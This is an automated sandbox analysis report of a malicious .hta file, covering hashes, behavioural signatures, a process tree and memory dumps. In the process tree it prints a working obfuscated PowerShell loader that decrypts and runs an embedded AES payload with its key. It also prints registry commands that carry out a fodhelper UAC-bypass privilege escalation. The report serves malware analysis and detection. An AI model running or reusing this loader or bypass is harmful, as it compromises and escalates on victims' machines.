Overview

overview

8

Static

static

1

305bf697e8...f8.hta

windows7-x64

3

305bf697e8...f8.hta

windows10-2004-x64

8

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/04/2024, 03:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    305bf697e89e6eef59b0beef2b273a1daad174ebec238a67a6e80c5df5fffaf8.hta

  • Size

    73KB

  • MD5

    895ee3f2e0558873611f58c50200946f

  • SHA1

    849030d4496209542fd02e52c2a180d763705755

  • SHA256

    305bf697e89e6eef59b0beef2b273a1daad174ebec238a67a6e80c5df5fffaf8

  • SHA512

    5738259687452334c22ba532e3dcd441c156ba8c87ca4e91a15d2b294bd6ac26b0bc07d4a42b4ef01bbcf886951d1a350bb9b6b298ad089faef266a4444a4fd9

  • SSDEEP

    768:KzGOeG/Nvx8XxydOVsTY5pi37n5wMhRSuDth24/kdikQlRpaU+eh9qVNV+UboV4Z:scyNvaXp6IN+QVFi1G

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\305bf697e89e6eef59b0beef2b273a1daad174ebec238a67a6e80c5df5fffaf8.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4596
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $PJAsQqQ = 'AAAAAAAAAAAAAAAAAAAAAE9xNraxk6nXNMEZnNi5un1gwXNzdqqUGCFz/tAl0UIoGIW3c8a5FTgAimWNllMn5MRQXV0f2ndktB+ScJeYrgaw2Zyh3otPRrj8YIGY6nNXDLTeH7i7AhI6B3xnFugy3jnfkIGKhOeqsZrnGRZvutLnhojFApgy0Uos4vB0GLskI0qK+ZAfMpHmZblte5X+dEbJZ0w05+eTEmITMPZG1zxWCgSWe5k5glpGmOK+7NKnbC+1MymC6ErGOSljG69lVYdMG6kWDzd9gGOBCdzWlp+jr7wyZy22P+fuCxrcUKibHRVdmbA2wf+om1beUUAOMRqqay/k40ffqnrlK6Cb0ih//idwGadtUkCZLI5OxNKdUu8gip1uZj/blioEk95UTeMFlSB6BdrGQTQYHbJoFbCl4E5FXMo9Chgc5zsbMh+dt7NG+qoZMnqhvwyWPXjLZY54iYpscKpadktwAdauUKugyzzs3nQKeIb6EPTjij7UxEg0nCb9HRyNqs/BCJW2ww3QBVxFxjL6IS8kD1QuTDDKuKafZGYjJbYAy9UuyB87bLKcNnobqmY/AXwBynbda4hcH/7cKSQgCJQUv1XHZa8+1Igpbz3Fm3Fz4nhelDdSCZoF/ZbLXfx+WL48jAaA7s9pFXDFNPF0pSndIHqSYDXx1xRSiooTiFKHvcEZSGUEtWw86xzh2HsYGqTqnuuTvjxmjuLNDd3AfOtg6s9CzH5cxJCtjdWbDwcIS69ueFhNTHT+KzAgkGo3eCo5xg3JV31KDUQ/6vgxnWJln/jxtrUSC2LzxWiEJZkntNdXQ304JsrzOHEpwPUh9aA5KBC0tqpKpIPtf191r9DOOLQBgv1DPwScSDpL3gh0nu6LdfeQagfdrbU87lBgB44odviSXCG9mF0+gFGFfe8wB7m/ff6ETJCi9gos2Dc2IgUoo7ok+qhGn/8gDowSWv2Tx/NQBmuapTfmPb43dZEAGA0HVF1BU7i4sDzpADXvir69XuIV/kesfDhfa0Y0RQfj0NhLGBe9DI3yzBg87omiD+iMjZNZK1nFAkRJkBAmdyE8mrki7g4cpMmnxJD8a7Kb1RYjgk1EjsPfH1ycKU50lDIct5U=';$cuVhk = 'RVRVd2h4RUJHUWNiTEZpbkN5SXhzUWRHeFN4V053THQ=';$cttmLzkC = New-Object 'System.Security.Cryptography.AesManaged';$cttmLzkC.Mode = [System.Security.Cryptography.CipherMode]::ECB;$cttmLzkC.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$cttmLzkC.BlockSize = 128;$cttmLzkC.KeySize = 256;$cttmLzkC.Key = [System.Convert]::FromBase64String($cuVhk);$HiYKp = [System.Convert]::FromBase64String($PJAsQqQ);$xvAueGsk = $HiYKp[0..15];$cttmLzkC.IV = $xvAueGsk;$rIhTDzTVS = $cttmLzkC.CreateDecryptor();$XwpnnDrAK = $rIhTDzTVS.TransformFinalBlock($HiYKp, 16, $HiYKp.Length - 16);$cttmLzkC.Dispose();$UJFOKyfk = New-Object System.IO.MemoryStream( , $XwpnnDrAK );$lnNgd = New-Object System.IO.MemoryStream;$rHRHvioHs = New-Object System.IO.Compression.GzipStream $UJFOKyfk, ([IO.Compression.CompressionMode]::Decompress);$rHRHvioHs.CopyTo( $lnNgd );$rHRHvioHs.Close();$UJFOKyfk.Close();[byte[]] $aXUoDu = $lnNgd.ToArray();$PKsIu = [System.Text.Encoding]::UTF8.GetString($aXUoDu);$PKsIu | powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:336
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2400
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
            5⤵
            • Modifies registry class
            PID:908
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
            5⤵
            • Modifies registry class
            PID:404
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3404
          • C:\Windows\SysWOW64\reg.exe
            REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
            5⤵
            • Modifies registry class
            PID:1708
          • C:\Windows\SysWOW64\reg.exe
            REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
            5⤵
            • Modifies registry class
            PID:3088
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3856
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\Admin\AppData\Local\Temp\r.bat" /F
            5⤵
            • Modifies registry class
            PID:2716
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
            5⤵
            • Modifies registry class
            PID:116
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4896
          • C:\Windows\SysWOW64\reg.exe
            REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
            5⤵
            • Modifies registry class
            PID:392
          • C:\Windows\SysWOW64\reg.exe
            REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
            5⤵
            • Modifies registry class
            PID:5112
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3792 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1740

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      c580727fc0a7a733ea6a446b67ca63f7

      SHA1

      ebdd57fca25df0f759dec07c5382d560df7600c2

      SHA256

      369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073

      SHA512

      2a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l04l4prf.jbc.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/336-23-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/336-47-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/336-40-0x0000000008220000-0x00000000087C4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/336-39-0x00000000070C0000-0x00000000070E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/336-38-0x0000000007110000-0x00000000071A6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/336-37-0x0000000004780000-0x0000000004790000-memory.dmp

      Filesize

      64KB

      Download

    • memory/336-36-0x0000000006EF0000-0x0000000006F66000-memory.dmp

      Filesize

      472KB

      Download

    • memory/336-35-0x0000000006D70000-0x0000000006DB4000-memory.dmp

      Filesize

      272KB

      Download

    • memory/336-25-0x0000000004780000-0x0000000004790000-memory.dmp

      Filesize

      64KB

      Download

    • memory/336-24-0x0000000004780000-0x0000000004790000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2420-7-0x0000000005F10000-0x0000000005F76000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2420-0-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2420-22-0x0000000006B10000-0x0000000006B2A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2420-20-0x00000000051C0000-0x00000000051D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2420-19-0x00000000066A0000-0x00000000066EC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2420-18-0x00000000065F0000-0x000000000660E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2420-17-0x00000000060C0000-0x0000000006414000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2420-21-0x0000000007D40000-0x00000000083BA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/2420-6-0x0000000005EA0000-0x0000000005F06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2420-5-0x0000000005580000-0x00000000055A2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2420-4-0x0000000005800000-0x0000000005E28000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/2420-3-0x00000000051C0000-0x00000000051D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2420-44-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2420-2-0x0000000002F70000-0x0000000002FA6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2420-1-0x00000000051C0000-0x00000000051D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2420-50-0x0000000071360000-0x0000000071B10000-memory.dmp

      Filesize

      7.7MB

      Download